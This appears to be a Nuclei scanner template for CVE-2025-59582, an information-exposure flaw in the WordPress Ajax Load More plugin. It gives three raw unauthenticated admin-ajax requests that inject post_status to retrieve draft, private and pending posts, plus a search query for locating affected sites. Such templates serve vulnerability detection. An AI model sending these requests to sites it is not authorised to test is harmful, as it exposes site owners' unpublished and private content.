id: CVE-2025-59582

info:
  name: Ajax Load More < 7.6.1 - Unauthenticated Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The Ajax Load More – Infinite Scroll plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.6.0.2. The plugin's AJAX endpoint (wp_ajax_nopriv_alm_get_posts) allows unauthenticated users to access non-public posts (draft, private, pending, future, trash) by injecting post_status via the custom_args parameter, which bypasses the post_status authorization check in class-alm-queryargs.php.
  impact: Attackers can retrieve sensitive embedded system information, potentially aiding further attacks or data leaks.
  remediation: Update to the latest version beyond 7.6.0.2
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ajax-load-more/ajax-load-more-7602-unauthenticated-sensitive-information-exposure
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/ajax-load-more/"
  tags: cve,cve2025,wordpress,wp-plugin,ajax-load-more,unauth

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:draft HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:private HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:pending HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"html\":") && contains(body_1, "\"totalposts\":")'
        condition: and

    extractors:
      - type: regex
        name: totalpost
        part: body
        internal: true
        group: 1
        regex:
          - '"totalposts":([0-9]+)'
# digest: 490a0046304402204aa476f3eb6f48527676ec3bc7e4f2b5c472e611fc8b9d5f8491e1d1ac527aa402204b9666554e2fc5cca10d1bf98e569bedfcb057a7b6f51db4edc4370f060f2648:922c64590222798bb761d5b6d8e72950